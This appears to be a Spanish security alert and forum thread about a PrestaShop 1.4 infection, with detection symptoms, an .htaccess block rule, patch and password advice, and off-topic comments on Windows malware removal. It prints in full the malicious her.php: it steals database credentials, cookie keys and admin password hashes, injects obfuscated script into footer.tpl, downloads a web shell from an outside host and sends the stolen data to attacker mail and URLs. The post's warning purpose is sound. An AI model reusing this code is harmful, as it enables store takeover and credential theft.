LA SOLUCION AQUI:
http://www.prestashop.com/blog/article/please_read_security_procedure/
PUEDE ENCONTRAR MAS INFORMACION EN ESPAÑOL AQUI:
http://www.prestashop.com/forums/topic/126214-por-favor-lea-esto-procedimiento-de-seguridad/
Atención se ha detectado la presencia de virus en prestashop, al parecer los afectados indican, que aparece un nuevo archivo dentro de la carpeta modules, llamado her.php, que presenta el siguiente código:
<?php
error_reporting(0);
$shcode = "{literal}".base64_decode("PHNjcmlwdD5TdHJpbmcucHJvdG90eXBlLmFzZD1mdW5jdGlvbigpe3JldHVybiBTdHJpbmcuZnJvbUNoYXJDb2RlO307T2JqZWN0LnByb3RvdHlwZS5hc2Q9ImUiO3RyeXtmb3IoaSBpbnt9KWlmKH5pLmluZGV4T2YoJ2FzJykpdGhyb3cgMTt9Y2F0Y2gocSl7enhjPXt9W2ldO312PWRvY3VtZW50LmNyZWF0ZVRleHROb2RlKCdhc2QnKTt2YXIgcz0iIjtmb3IoaSBpbiB2KWlmKGk9PSdjaGlsZE5vZGVzJylvPXZbaV0ubGVuZ3RoKzE7byo9MjtlPWV2YWw7bT1bMTIwLW8sOTktbywxMTYtbywzNC1vLDEwMi1vLDM0LW8sNjMtbywzNC1vLDExMi1vLDEwMy1vLDEyMS1vLDM0LW8sNzAtbyw5OS1vLDExOC1vLDEwMy1vLDQyLW8sNDMtbyw2MS1vLDEyMC1vLDk5LW8sMTE2LW8sMzQtbywxMjItbyw2My1vLDg1LW8sMTE4LW8sMTE2LW8sMTA3LW8sMTEyLW8sMTA1LW8sNDgtbywxMDQtbywxMTYtbywxMTMtbywxMTEtbyw2OS1vLDEwNi1vLDk5LW8sMTE2LW8sNjktbywxMTMtbywxMDItbywxMDMtbyw0Mi1vLDc5LW8sOTktbywxMTgtbywxMDYtbyw0OC1vLDEwNC1vLDExMC1vLDExMy1vLDExMy1vLDExNi1vLDQyLW8sMTAyLW8sNDgtbywxMDUtbywxMDMtbywxMTgtbyw3MC1vLDk5LW8sMTE4LW8sMTAzLW8sNDItbyw0My1vLDQ5LW8sNTItbyw0My1vLDQ1LW8sNTktbyw1Ny1vLDQzLW8sNjEtbywzNC1vLDEyMC1vLDk5LW8sMTE2LW8sMzQtbywxMjMtbyw2My1vLDg1LW8sMTE4LW8sMTE2LW8sMTA3LW8sMTEyLW8sMTA1LW8sNDgtbywxMDQtbywxMTYtbywxMTMtbywxMTEtbyw2OS1vLDEwNi1vLDk5LW8sMTE2LW8sNjktbywxMTMtbywxMDItbywxMDMtbyw0Mi1vLDEwMi1vLDQ4LW8sMTA1LW8sMTAzLW8sMTE4LW8sNzQtbywxMTMtbywxMTktbywxMTYtbywxMTctbyw0Mi1vLDQzLW8sNDUtbyw1OS1vLDU3LW8sNDMtbyw2MS1vLDEwMi1vLDExMy1vLDEwMS1vLDExOS1vLDExMS1vLDEwMy1vLDExMi1vLDExOC1vLDQ4LW8sMTIxLW8sMTE2LW8sMTA3LW8sMTE4LW8sMTAzLW8sNDItbywzNi1vLDYyLW8sMTA3LW8sMTA0LW8sMTE2LW8sOTktbywxMTEtbywxMDMtbywzNC1vLDExNy1vLDExNi1vLDEwMS1vLDYzLW8sNDEtbywxMDYtbywxMTgtbywxMTgtbywxMTQtbyw2MC1vLDQ5LW8sNDktbywxMDEtbywxMTAtbywxMDctbywxMDEtbywxMDktbywxMTEtbywxMDMtbywzNi1vLDQ1LW8sMTIyLW8sNDUtbywxMjMtbyw0NS1vLDM2LW8sNDgtbywxMDQtbywxMDctbywxMTAtbywxMDMtbyw5OS1vLDEyMC1vLDEwMy1vLDQ4LW8sMTAxLW8sMTEzLW8sMTExLW8sNDEtbywzNC1vLDEyMS1vLDEwNy1vLDEwMi1vLDExOC1vLDEwNi1vLDYzLW8sNTAtbywzNC1vLDEwNi1vLDEwMy1vLDEwNy1vLDEwNS1vLDEwNi1vLDExOC1vLDYzLW8sNTAtbyw2NC1vLDM2LW8sNDMtbyw2MS1vXTttbT0nJy5hc2QoKTtmb3IoaT0wO2k8bS5sZW5ndGg7aSsrKXMrPW1tKGUoIm0iKyJbIisiaSIrIl0iKSk7ZShzKTs8L3NjcmlwdD4=")."{/literal}";
$shurl = "http://www.c2bill.it/stest/chkpnt/shell.txt";
$msgurl = "http://www.c2bill.it/stest/chkpnt/sdata.php";
$mails = "samuvel_hitroy@aol.com, preop@gmx.com";
function deletedir($arg){ $d=opendir($arg); while($f=readdir($d)){ if($f!="."&&$f!=".."){ if(is_dir($arg."/".$f)) deletedir($arg."/".$f); else unlink($arg."/".$f); } } rmdir($arg);closedir($d);}
@include("../config/settings.inc.php");
///Host info
$hostvar = "host:".$_SERVER["HTTP_HOST"]."\n"."ref:".$_SERVER["HTTP_REFERER"]."\n"."path:".$_SERVER["SCRIPT_FILENAME"]."\n=====\n";
///Server info
$srvvar = _DB_SERVER_."\n"._DB_USER_."\n"._DB_PASSWD_."\n"._DB_NAME_."\n"._DB_PREFIX_."\n"._COOKIE_KEY_."\n"._COOKIE_IV_."\n"._PS_VERSION_."\n=====\n";
///GET admin
mysql_connect(_DB_SERVER_,_DB_USER_,_DB_PASSWD_);
mysql_selectdb(_DB_NAME_);
$r = mysql_query("SELECT `email`, `passwd` FROM `"._DB_PREFIX_."employee` WHERE id_profile = 1");
while($ro=mysql_fetch_assoc($r)){$usrs .= $ro['email'].":".$ro['passwd']."\n";}
//Wride sploit
@deletedir("../tools/smarty/compile/");
@deletedir("../tools/smarty/cache/");
@deletedir("../tools/smarty_v2/");
@deletedir("../tools/smarty_v2/");
$fn = "../themes/"._THEME_NAME_."/footer.tpl";
$f = fopen($fn,"r");$ff = fread($f,filesize($fn));fclose($f);
$ff = str_replace("</body>"," ".$shcode."</body>",$ff);
$f = fopen($fn,"w");$rf = fwrite($f,$ff);fclose($f);
if($rf>0) $wrres = "true"; else $wrres = "false";
//write shell
$sh = file_get_contents($shurl);
$shf = "../upload/".md5(date("r")).".php";
$f = fopen($shf,"w");$rf = fwrite($f,$sh);fclose($f);
$shf2 = "../download/".md5(date("r")).".php";
$f = fopen($shf2,"w");$rf = fwrite($f,$sh);fclose($f);
@unlink("../download/.htaccess");
$msg = $hostvar.$srvvar.$usrs."=====\nTemplate writed:".$wrres."\n=====\nShells:\n".$shf."\n".$shf2."\n=====\n";
@mail($mails,"new shop",$msg);
@file_get_contents($msgurl."?data=".base64_encode($msg));
@unlink(__FILE__);
?>
También comentan que podría ser una vulnerabilidad que hay en el código del archivo footer.tpl, que aparece también modificado por el virus.
Al parecer hay usuarios con distintos sintomas, pero practicamente todos indican que la tienda no deja hacer practicamente nada.
Hay usuarios afectados, incluso teniendo la tienda sólo en local.
Dejo una recopilación de cinco puntos que se han encontrado para detectar este virus/hack o lo que sea:
1) Una secuencia de comandos se añade al archivo footer.tpl en la carpeta del tema activo.
2) Un archivo PHP se crea tanto en la carpetas /upload y /download.
3) .Htaccess que se encuentra en la carpeta /download es eliminado.
4) Las carpetas Tools/smarty/compile, tools/smarty/cache y tools/smarty_v2 son eliminadas.
5) El archivo, her.php dentro de la carpeta /módulos, a veces no aparece. Este archivo es eliminado después del provocar el hack.
El antivirus AVAST detecta el virus, al entrar en la tienda por lo que teneis que tenerlo en cuenta por si os pasa…
Comentar que los responsables de Prestashop, han comentado que están preocupados y sorprendidos por la gravedad del asunto y que ha sido asignada esta vulnerabilidad como máxima prioridad a sus desarrolladores más calificados. Maxence y Mike entre ellos (máximos responsables de Prestashop), están trabajando en el asunto. Se está investigando para tratar de localizar la vulnerabilidad en el código de la tienda, incluso si esta vulnerabilidad se encuentra en un módulo externo.
Tan pronto cuando tengan alguna noticia que darnos, seremos informados.
Foro Prestashop
Decimelo a mi !!!
Un bardo mal sacarlo…
Sintomas:
— Te pasa a hidden (ocultos) todos los archivos del disco de sistema
— Pone el escritorio en negro (y al estar todo oculto no aparece ningún icono)
— En el boton inicio solo aparece un link trucho a un supuesto Cleaner o Recovery (que invita a pagar para librarte de la infección)
Como sacarlo:
— Arrancar en modo A prueba de Fallos
— Y correr el Malwarebytes -de varios que probé es el que mejor anda-
— Después hay una herramienta que se llama TDSSKiller (de Karpesky) que es gratis y ayuda a borrar definitivamente una parte de la infección que se va al MBR (si, ahí mismo… al arranque)
Bueno, gracias por la info y ojalá el aporte sume !!!
En las tiendas se recomienda en el fichero .htaccess (si existe) colocar esto:
RewriteRule ^modules/her.php(.*)$ 404.php [QSA,L]
Después de “RewriteEngine On”, con eso se evita que se ejecute y tendremos tiempo para poder limpiarlo si la tienda se infectó.
Dudas que puedan presentarse:
1) Mi tienda no ha sido afectada, es necesario realizar este proceso?.
Todas las versiones 1.4 necesitan aplicar la revisión. Es decir el proceso de descargar y ejecutar el archivo herfix publicado por Prestashop. Incluso si su tienda no ha sido infectada.
También es necesario, que se cambien las contraseñas de la base de datos, de los empleados y administradores de la tienda.
2) He utilizado otro método para resolver el problema que no es el de esta guía. Mi tienda funciona perfectamente, ¿debo yo seguir y realizar esta solución?.
Sí, debe utilizar esta solución.
Aqui teneis un video donde se explica el procedimiento para solucionar el virus
http://vimeo.com/28144755
Una pregunta, el virus como entra?, parece que a usuarios de windows que administran la tienda desde ese sistema no?
Sería una solución administrarla desde otro SO?
Esta jodido esto del virus quiero implementar el e-commerce en una web de la empresa estoy buscando info.